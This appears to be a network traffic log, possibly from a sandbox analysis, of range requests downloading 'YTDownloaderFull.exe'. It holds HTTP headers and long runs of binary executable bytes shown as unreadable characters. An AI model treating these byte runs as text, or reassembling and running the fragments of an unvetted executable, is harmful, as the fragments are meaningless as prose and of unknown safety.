Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1500000-1749999/7202264
..jS.n..1.G.....%.....-B....g...Ex..Fk.\@......5....B1`Y..............
o.9..-...T|...ON.=b..Z...f..c4..2\WT.lM..^` .Ps.d..J..D.H..kc?......g.
....(["...>....z..^..p&..5....2...(.um.$T.e....m?....f.YF.iu.....w.
|............%p \.&..Z.L..P9.r...Q.........^..h....m..*./]....^.9. .,4
5..g(.....0...........f6nE...L...._`..?....>......N.../...d.;D.z*. 
..;p.t#o.i..F.~.Bb.......-..E{.b.K .c..........d.........K}....H.....F
......7...5|..".=|[email protected]:Ihy.?<..2t.....#(-lC.......a.....'....#g..
./`..k=".y...N`.m/..?.6..w.).A...-..Ov.....;I.x..?x....l.......k.aZ..!
.."v ...J...*.....MG_....P.7....B`.}.4`......oaTa..[....^.g.........bZ
...;N..7.^. .C...[...G..a..~\r..8.!(....z-......zk...._.{..........i8@
_:.r..h....2...9.x'.....5S.'Z..5....B...*...dSM.,...Z}...QJ?{...'.w.P4
a .........G.(.....u.Y.....5V..1..e.JKv)....`......$*. .2M..s!./.....p
...C..=........h......=...... ...gE..Q.\...13...7_..O....f.2..~27`....
..NV_...=..Cl[....HX.u.,.j....,E$[w.<V6.p.sL.-.........>\V....Z.
-#D.3.R.o...J.....F..B....e.8a.h..Z.^...h....{.R>...wp....u.....AI4
....\NW.g.J......T.N$b...e.c)>9.....|./.......V.{.aT ..#.`i..(%2...
...E.~X..5.....6.0....x..2kq.U.S.....l.*.m.].....Sf.D...l...KN........
.J..Cm1.3W.. 8}.iE.~k.BDn..x[.".yz..l.I82..D....1.FQ..-d..U..../......
@...F9C....`.E.QH.n.Q).ek..z..ID7O...l8I......P.iA..H..r.A..HM....N.w.
..T.].d.t:.K#.rS;l.Y.H...#L....Z.'..}...$=.:....i"(...}c.-...?.7.. ...
{....fi..P.g.8,.....M=.4.w..|.X....;<......x.Z.6....../l.D..>..v
9..2..............]b....L..|......@.=..>.TW=Ygr...h......k.<<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:22 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2000000-2249999/7202264
.*.Q`..P.. ..".[..[... .p....#i_.#[email protected]%..B['.......
..M}.$.lfi..N...w.@..|....-.........~?.....T.. Y.w..6.j....I....DX)AP.
........*..3aj....z..X.D.........x..k.}q'...59O.<...bL...\R_...K9..
.)9F.ow..M..Ok{.|sp..eU....,..PW.p.h.>/H....e.2=....b..f..<d~Q*Y
._*..K).4.4......duj..z...0.vg?K..a...,...o_.eC;.......d........fG.z..
.p....SM........^(...3..8J..p..!..Q.W..j&..f ....q...tp....%.........0
.ETe...].0_...g^..Kr....Ro.'..m...$<.x.zN5.-...7'......s.....I.c...
 .t...o.........o...^.N.C...Y..G.{..Y[....O`...b.....?`^../.x..a.%.RK.
.8>...%..=..~..N...).)[email protected]_>.^..8.AD.|.y5.,
..'.e#\L.o.e|[email protected]....[.&h.. <O(k.O. .k.8.`=.....;b@:....r.V
,.....*.M....?.'....|....V),.....3........|..3.GH...].k.0..f"..3.8....
.A...o......o..t.......~.....xOZ..g...P.|~......R.....I...!..s#.%..z.v
.9)....E...U;`.'..~(:%.. ...........l......]..a;[email protected]..
.k...'|[email protected]...=..8.dK..S...a....m.)j..J?..D..&u....g.t*[email protected]
..n..m..CA.*.....U..........IG...G.......QD#[email protected],..9.E..B
.(K ....../.......;...u..... ...1..c....!...'o.4..x:......G&t..?g.l.Z.
........I..O.;....OM..8.%oWQ...'w..&...R.....:9a......p.h.....M..c....
z....I......fO.....-x...~~(../....r..o5..a..t 9.ih ......D.....YD..~.l
.H.(.L3<."}..1..>...9qZ...PO...c.../e`..^[email protected]......*...
........6f.*.P.8..(.)u..H....7i........0I.N...F..s...........y.._-....
.d.5...,.6R..fR..E...d.N.`,.d...\%VT(..8..[...m...[...^.:j.<[email protected](.
.7'..*v.....8......M.ta..v3..:\..........o...'6s ..7GA....=..p....<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2500000-2749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:22 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2500000-2749999/7202264
')..'f5*.....C.X.".F..U......AJ.....-f2. .A.q.x.`G<.#.:..~8..V,Pct.
7.[..........bQo.[...[...ph.g.r2...>..V. .x6..}x.../...6/.(....l...
 ..'.....W\......O.^..C&..p..y..}..g..3...k]..;.........y..j..Q...3[.n
..:.f.P6...S]....d...,.RQ.......P.Q........e..3...&2] ......P7k?.G..1.
t... ...k....>./.....nn......l.Z.R..m......#...y.].....u..zun..'qE.
.7...=T..(.....".1........mE..M.x9..W ....S.'R.A....} .._..g.k....1...
..hd0.-%..W#.O.e!.UY...Y....Di....[.Y.M.QC.j...p....=d....ho...U...a..
..hf .@-F6.......%...'[email protected].... .$I.:.7...Ek*.."G....x.
z^._I.."w(.....%.9..7.`2......<.....x-BJ.s..........l.J.]AId..37'..
...W.U.Z..v"..H....Ssh.}...XTA;l........=./.-0!...4QuJr....;......HG..
5..3.W.Uf..E..........g#..|0..$. b... ..Eb..T.(.b.g.q.a...l..LE...q.t.
....v......8L...[GF.xJ.8Y@.....'. .......rc..r....yA....o..a....Yr\..(
......'..Mxg..iK/.dM.%.......m..z....F.......{.}.......a..a.a.....?g.#
..,......}[email protected].....'".L\1..sU.S4[O......y..w..".....
.g..&..V.w$..D....H.w?-7N.)..6.I.nJP..}..t.Y5..8.....8Ww.9.j!...A.C..F
G.d.}..p^X!.6=..`..A..........n..<s..N.Q..rLt....{-q.].p..U.m..y.D.
C. I.....I$... .<'....@/[email protected]?A[
.A....)...y`....`..\.a....k8\#.;.xMsE...b;..3.D.1.}...6..},1...N.R..sQ
...R.....-...FiS...8.\._..H.c.y....GZ0KW7].p.#;[.]r E.N..:..i..>.J7
.#p..6.{V.....z. ..|d..:.Wev.X..j.C....L4-.i....E[f....<&......@.(m
..SY.L.]...8r*.........[.aF.[A.;....{=l.6....C..YP.R....6....7........
NV....j......Y.Y.S.o...Q...y..... .XSz...Yt...5...w.a... .x_..m...<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2750000-2999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:23 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2750000-2999999/7202264
...|....\..n..,E.!Br...~...q..~^...... ...!..x.M..#.Z.....|S......F...
.a..........KJ............._..-h..C.. =.......q...z...:m.{)`.c..j..Yb=
t.....e.....IBj).>..{6.Qm!X..MH|.2..1).5.A.`..*.~...R|0..p..#..z...
..v..z{)..CZ(.&.|U....phG..f..g..~...G..).{H.........#@IZ..G\.z....J..
..#._*.c..<a..F.09w.#.a............_..b....z.gR.$......S3.....h....
...sG;.....][..^.......u....).c.;Fc. k.c....g<^........q..\..]n..*.
..... .0XW|.....A.(..6G`.....K.e..i.E...2.f........M..v0:S8.aD...iA...
B..f...I.l0^.....Y.....)..P...b.#Kf.../)..E6ff.P$.\T....&..].....~./.(
.%..e`..&(#...\/\S......c..,..K...Ap.`.C.|q..k|..[<e&..p..Y&./.Y}..
./[email protected]...$. KyY|
..n...9Y.-.w|..C..-..7G.o..b.r.O.....{]!9>.../]..z.V..8}xo.. ....`.
..... `..0.{...?...a.9,iW\.....xq..Z.j..f.yN<......#..~k....7..';.P
.~.....FT%b....#H.s....)....'R..f.}.t}.../h95.H..>Z.. ...`..%T.lS.{
.U.3..#<tD..h...[y6..[...........y.......o...l..7..V{ ...,....._=.T
Pu....^Z............;..g...v..4.q.......1..$.&X7.L.......H...}..JD..T.
.m..(V...g......s./....&c.e*....................{7..w.1.........-F...f
.....S..S.6....DL~...h....5......g7.f..!.(.!.^.m.y*].%Y.....j..qYHb'..
.....|.....4..i.`..f...z.DW.....M.Y.?.-f..s.~d`.2..k1".`S&i.L>wy...
[email protected]."...........R.P...^e...ja..V.....$:.R......
.0.....M.>[email protected].<.I...$.2-=).T.DNv..s.....;8...ax.......)V.D...
A...].e....,...H>..ZP<....{y5Y...i......S..{.t*y/.....wj.=...H.z
....m/..._7.f._.h<T.....u..c($.P.....@!C.<4>B...p...o'd85<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3250000-3499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:23 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 3250000-3499999/7202264
.bf..-....c....q..-`\W......g.j.4....x$.B.n9C.U..... .v..<{$.....Q-
....o..G..m..Q.........T.."...dv.L.....9..R....p ;[.g.. ...._..."R~.&g
t;.h..-mQH.o...}6.2.....[./..R...b_a3.9.=3='.K%.. ../.....W...E...)...
.).......H3..%}.]a.D.........?.R.~o.. ..m......z..N.a.|./..j.x,....W].
{C9.n.r'........w..h..Te.c..{.i. \ ....kL.2.c.8)...>...~..[v./..U..
s!.ym..e.i.&...B=...T..o.(.....`..8.......w.X.0....,e..."..d.c....E.u.
......tK.}e.,C...........i.B..).B._.L7.....S.g..y..|..n..}..ym6.......
74...9zf.......6L..9pifHT..HuJ<..^C..x^....i...'A..'ij....t1:h...h.
r.S.s4..98......;.-5....t..tP..J...|Tx$.,.&}........3'....t...~.....sN
."_....umq...6O..h...9.E.\.....6..q.N......S0...7....B8."8m.k.|<H/F
....:..Lw0.....q..S..*J.VD......J.h..C...n...w1..>b.J.NK =..e...2..
W2...si..$K.\......Xu...)....5r..(.t ..<<.e.v.^.9/...?...!...'N0
X..y..\l52S....b...jl...y"..c.....'..$:.38.lUM)g......oPE....@.......*
.Y.BCbY.=*...qB..z(...4."L.M/......P...b..*..~.c...yP0S...T.?.j.$.....
...O$.....T.bAn....=.. ...q.1G..GV...5...6..T,[email protected]&.C......
."gz.;4Y... &.f8~l/..U.>..Q.U..F.....m..z...p.............eN..:..v 
......|z./G*1.D6..-..'.........G[Wtvx.m.j.e"...hu-..Njh>...[.*..$..
..q...1.r....=&............(A.Mm[......Fi.cw....te- vYCg..J...|....B.0
..rx6..f.....`=.....\.@1."[.U.}y..6...... .&.).....!A........L.....7..
w9.n...=.>..f..~S.'..D,].{{.c...dB...0..,..xf...I..D.o......r.k..}.
.../..6 ..]..ft?{...............).c[..c(u.....6]....".iX......L....EJ.
.......A.1S..`Zbt.....G.....@"z...W....'.r!..1...O....n.U.9. n..H.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3750000-3999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:23 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 3750000-3999999/7202264
.z..h..\E......$..m...|.Z........./D.."jo7.w.d.u7.%W.......M....c'P.O(
...t@.?.t7.....8.g..T:!..GJnt...` .......,....9.U..8...Z.m.x....4.o.t.
/.e.9~......z3.5.....Dp1g;....!.^.....O.Qd..[]""....u.........p.!....i
...^...([email protected]&
lt;..8...H.....G9d.........WO.d......6.\..|..|[email protected]. ..hf.,.zQ.tc..N$
.....|...?.._...ldr.T..Z1....7gh...F~.u.......h..7n".0..j`.*.e.:..6.B.
.F....1.....-.{*.Ep.....`/......-......{).....n.q..s53...7....S....G..
G.w.`.J. ......mM:o..,.?..8.;........W'..I..D.......b.tz\.....%.^U.. .
}..4.T........}.. %^.Ua....;..).&..w.GX..c...Ho....(....v.)...#.?C...G
..L&X.d.g~./.M......n.rW. a...S|-0.e...=.m.7...\|....9..S.-r0.3..V#*F.
2DW.......Xf.B...R..n.EJB.....[.F.ZM<...;./..v%..F..K..)[email protected].
.Y......qM:v..3.5.Sqv...bQB...x..GH/?.cQ..r:...0.......P....P..m..Q[..
.k...8.wv%:......R.T;"r.q...g..f'.....u...|#4)Y...YW.....Z.<l.._/'T
sc.R5pVy.....e.K...z8....t....l....WC,B..h.I"...A.G.7..%.}......&OA.n.
M`..z.*.c.c.n.G,...M....t.g...$rl.8M..3Qa..4.(..u..~v.lv.~.0..jY"G.&(}
.sB..o...H)Gt..i...jK......B..K.cm...t....t.f.W.`.h..j.......!.u....^V
.v..$0"..*..:..7.u.gC8......4.M..L./5.ZL.3.`.gU.~N......%E..m...h....=
`..h^.Z.p............~.m.)D.-bz..Gh......_..e...P.........F..... ....?
...W].. o.....8.VV...2VFg0.}.&...%>HH.*.]......Lv..b~.N.{o!#..e..yw
..7R..!. ..L;......H..L......6."..""%..Z;"Y..*.9.s..../.<..h......}
.x2,.....P.....\..../.Z. [email protected]./.v..}...&t..(.
..."V.......V.t..F.5.."h(.[[email protected]...&.....h0_...$1.>.../<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4000000-4249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:23 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4000000-4249999/7202264
$aj.."?.....wZ..J..$..M.b......Z.*.!..........".k...K....J......1..n.~
y{...?Q5...w.K.....O\|..mGD., ....tn.C.X."`=._......&...zl....!"_. .|.
.I...........4Xp.k.\.R.........=3j..{...)..i.p..81NWU.z:.....n......P.
..I...........y..,l.6Iu......uA.BhV..k1.x....FolI.......[u...Z.<Q..
.?.6....=M.$.JK...].[..u.." .P......m&....pG....R@h.:1.&....17.....b..
$..{."...UC....ub..o.'.R..\[email protected].&(.......$.?2.P.` &e..Ux.:H.L..X.
....G.L`.............`g...1.P......A..L..H../..zd..0.-..1...A...u.J.Z.
 .........P......Y...8.9X...... . .F.-...ynge#...$.:.L...\P.....d.`...
.....H.:P...c..SS.........U\...eop9.!.\IC.t!.:..m..Q].....{....g.}.r..
.......7...{.w..w.}^...;.:.x.0..f.............5..>..n.5....}.......
)Fx....4cgI.J...Y.9.~...NF|.....r.f..........t..^{.T.........[...Uh.d.
s.B.J...............0..s..J..E...x..f5............x...I....9uF.......f
 ...^6......H. y.$.&.3].>...K.X.Bmn......cv....<...D.....3..A...
....Ah.$..'..O.....T6|t.....p..j..!,..}.G...rh...`I.l&S..........TS.W&
lt;.:0.J@?.....5.. ......6..@.=...............r....%....2..L<.m.5..
......|..t.W..>....",...2..G..tk'......n...k..O^..kP..j....r....~.o
u.BX.C.....Y....3....>_...C.Q.EUM.l.0=...:....{.>.6-.....%eX....
^.z.D.X..1..Q..|.,b.]..][email protected]}...*4......q..^..)...0.0M...p.
.......g.&|.8)..#...p......=.WT.%O,.:....I..Y...}..T..Qa...Y.<oM..H
...%....-.Q.._l....H...wP2.St....HA..=zM..U.i,..5..c?.k.J.}C..5.....K.
...... .V.......X../...v.I..`.......T.N....l.......4..J...o..C..T.....
.....Q....2O.3...0.aOX..q..D..]...y.y..21.7i..Ex.x.....{.5;.x.W\.k<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4500000-4749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:24 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4500000-4749999/7202264
|........l>g........;?.e.l.R........E........}.k,J.im.J..)....O.\..
.1.2.H... c%.......kP....V.D..q...kpA....N..{.4.;..-...p4.. =m8...r=..
?Q.c.^...}..VC...........8......~....(V^.6.'.....Z..Q.e....M.1F.4)...a
U{..V....v...y'./......,V...B..S....T.......%v....hsz.X.Y.....G[..8[. 
.\.P.... ........N=-..4..q.*M7.x..)(..X....eO..6.%..<j.h.NM,F....&g
t;qb..z....0..([email protected].%....u..F0. ..K.l..........>U...........(
.....n`[email protected]. .X>o.,.z...7....7]S.../Z8..5.mC..i
.9H.`6...{.X"i.G.;.].-......&x.g`......-.~b....t..O.1.B..t.....t.1.G..
.T.Wi03...(... .9kx.,.........Qon..\...l"Z..........p$&j.a......e..vz.
*h...Y......S... V"{..........f...6......Y.C......U. .~..J'.........sJ
....DW....s..r|w....X......2..0;.S..GM.6....<Br.3.....Q..UY.x]..N..
.\.. ..)%....@..$N.l..shx..\....hO]G......>.2..M..O..x.Q.]h..S.....
..|J.9.....ca.H...$.......ssn.f....?.BL,O!..d|~....[....9.f.z.^.......
.2.7..J.."..".ny}........?b.4^......`R7....Lx?.\.Os*]cF.g|.i...s..^.X.
.mWQ.8.ZT......\&s.//.......h.7.A.&.....[..^...M|....^......f......g..
a...]x..g.q.T .d3<..V,.mh.N[....gU.....* ....n%.Oc.q..#...Nk.).@...
.v...?..>.(.X........_... ...jU..t"..Pe.(....=...x>.!_}k....;|..
...Ba.SpMC......C.`..].G&...`..u..........d._\....*.(-.....[.>X.n..
.R.....v..(......Xn,..............w.U....R.1M.0.,Dq...6;.../..........
../..O..4.......^.....2r....9..........V.d.!o..]D.....hU...(yR.xB..=@.
.....Z.u.Fv.l.......Y~.........>L...."^e...P..0..B...\.4....<..c
..E%...<e...h......|:l.}.K0....p.......m.f;.P.1s.7.7.}....../i{<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5000000-5249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:24 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 5000000-5249999/7202264
......t...S..ZH..n.dv.0....P...^H?Q2M.......G.DA..A.~.l ..4:g.s.J.o.T.
.y8.L......X...}.UF...Q... .........#9.U...Y.E .3.d..........h.Xc....'
..4u..A...Y.]...R3../4...a..(0......J.:...W...ZF..I.._...F{..f_...}x&g
t;m 3..m.,5...n..7.G...1..pwNw....$...A.#....m.4oE...e.H.5H...._.r^l&.
j..:..Yp0* ..f).#:.u.ay".cN....Dey..08=.WT$.Y.7....47N&.7...(...*.'...
Q7.l....h......./......4..G.eWG.......X...oQ....q"?.....yq...Y....4.@h
t....\..$%O...1!.........m....ivD..`[email protected]...:.i.."W .CY..K....>8
...?.*..8...{.L9._..SZh.*...NL........;y(n...C2a.s.n!.'..s.q.[..:(.3.3
y.u.#..o.?0KZ:6..t.c..2.....DFx2W..,.....-..&....'......\..P}...IY..?.
 .....A..az.v.*.}'..^ys...l.8.....L...z.:...&W....]8..(..a..o.".<..
6...r2F&..s.d.E.._Z.{.3.Jj......C...EZ.*.,jhl...=8..W..ht.:....SM.<
.Dp.....pQo..4"..s...}..>.......jd.'..m..`..xV'....F........p.VrO=$
x..3.g..R.m QA.......w..O.....o...5lw?!g{....R...w..s . .....A..V*.:.4
.. Gw....G...[,.5S]......".iep.T.G.....GcR.3...?..x..{U..2 ..$..`.{.C.
.V...$.d.....(.b...|.@#..gi..1].........U.......(.....S.~...|s....U...
M7Q..P=. ..........a[....:Vo.5...,...7.........n.B...A.L.b,...*.z POy.
.3....L.q>U._.K............T....K.O.u.u..u ..........4..qj..^..-.z.
.|..Kl.["....U.]..z....N.C.......H.m.o.>.NYB.K.r.I....3..H...>O.
{..j.....w....F........o..?.jA.S...........&......)...|...B.e....O.]..
C.z...C....S..t1.M.../j._!3.R|)..... (.3U.D.....Q...3.n.).C..[?M....o.
...Cl....L..g..3....'.....'..OVM.u..MOA....I.......0U....Y.o.>.....
a.J5E.B. Y..0..`.^...P^......}7..o.3...........Ff..X...-..../9...2<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5250000-5499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:24 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 5250000-5499999/7202264
#.(...".#.J;G v.X......eQ.7M.......`......4A..I9a.lyf..X...Q~_...c...:
pl.z.x.g.}p....Vt..I.....>.....T.Ch........\......r.........#.Xh...
m...2....J.-..b.... r.....~.l.vbim.m...R..........>Y-p..a.5.E.B...f
:'O3N(..7"R....._.'(r.BV].:...(..8.fBT....\%m|.wtM..>e0X...qj..l...
7...W..\.."......ja.....;.44....'s......1/.V!.>...V...NpM.a.fm(.\.b
..]..V....-...M..|2....l[.e.iE0|...u.....Gj.Yc._6....V.ghz.T..:iWER-g.
.9.:..Dj=<......ot.f.y..9.W...D......_c.cm.p\..bU.LF........8(.4...
0....U ..iOQk..Qg5\%...{....u.g..B..%....#.j..S.#v.. ~..N.........v.$.
1.....m} .x......,...\.#q.,O....N....af[[email protected].|..
uR.......s.Q....<.r%.(..$.........k..`YV...',.w..1..-...]]...(.Y(.M
u.w...."....A;Q.%.'.Y ......U...i3.M.g....1..w......u'..dp]...K..a..vV
D......#..c...m:..Z........Uvza.h....8..AZ.........mC.q..O..8......M..
.....X.9J.vi.......8..^.x|..c.$z...N........-3.....5..^....:..(... x@.
......m.kw.z..,c......"...Y...;IJ=I.7...WFx4....jc..=......z...B...>
;.u..SI...-.\\T.D=.(..S.E._..R.^..O9...N8......*......3.|.A.}.7H.r.D..
.K...~.(&..F..z|6S.../..PC..2../.......l&0K.$rW.w*Z...O..u<[email protected]
;..l..)..2...k.qouRb...HdeMT;E4u..a.......f8.Q)M..i.........;'....L@ .
A[...i......Z.>..].jM..o.T.....q....\...en.`>#.w.,.S......d..d..
....a....yS.e<}...Q...1...E.v..&E>^.%.<.. .f.....:-...\.E..8.
Pp........?....;....MN.z.)..M...m...J.G......6...5.p.eV......d..".....
..kq,....<.....O.:....b.E...`..x........X........t....,...o^,dm..4.
.h.c..........^'u..L.t...m...Y.iP{....8.(...m....C.f..)..zEj,.....<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5750000-5999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 5750000-5999999/7202264
l.r/..{.qd.d..h0b.ad}..h.5S...4.......;..*d...W..!..~.....-`...wh.9.Zi
..rO....<N..S.\......D..... Vyh_...qqK..=......W.X....q....ntaP....
,.)7I,..!..Q.`=.........j*.I._.L.k.p.>R.y..&h.........%..P...o../.V
%%:..}yF.$.;/.?y....$...........!D...Z.5H.._.1.....u..'GF..T>.NM.&l
t;.OC^)......?j....vw...s.t|.n).#..t.w0.\.[.2.......'.P2EI.w.i.5.&....
=Iv.>.D/..*....4...Np.......... ....zO.8_.....o...'z..d.O.T.8.S_FLN
....>.Pt........^e..r........O..T.e...$ ...M.0X .z..|.}..z5B.......
...u.9..........^B'\*p)-..n-.KZ .. P........./At5...a|. .)...vC..?.U..
.l..6!=Zt..v.......T.\..:...$lK.o.<.#..~m.t.....k....l.e=W....=....
.....W|.8............1....0..........U.,.._B .`s.Iw..-....NZ- ..9.....
[email protected].....&n...L..N.2.W..t..........Y^.;..;.o.|Cq...'-...e.b
...A....7..n..s....>.r....3^30...!4....fP.d.u?.u>.z.Eabwp"....a.
.....%]...J'.uV..........w.9.4.e...d..}._i.T............f.Q...r[x....-
......&.F.........i....Q0p..8.O.$B.4.k2?..M.D.m.>*J^....f.[..D.*.9.
..O..|....6J...;...o*"..<.r7h.:5..7........L._....N..e[..lfB....M..
..-.....Q0.U..?....<q..{5T.4..=...~P....]D........H....D4.15&...n.z
Q.&i\[email protected].>E...m..lXR....kvY...N..d.X...
.g......D...(..wL..&............i..C...>R...3.a.uQ*...x............
...k.L..5.............n.9........9y4..;....]...I..joV..Q&..b$jF..W....
.z5k...(i.h........7O'..W..aT.!...a.Q.z.H.%j...;1........u{.,..}......
..7.q.$.'.<..~.s.C...]..H.f-........kd...R......ts...#.".U.d..`..-@
.l....rS.|..".J7.=. ..^(#.<.l....a..kd..../..V,....V..A~..8...'<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6000000-6249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 6000000-6249999/7202264
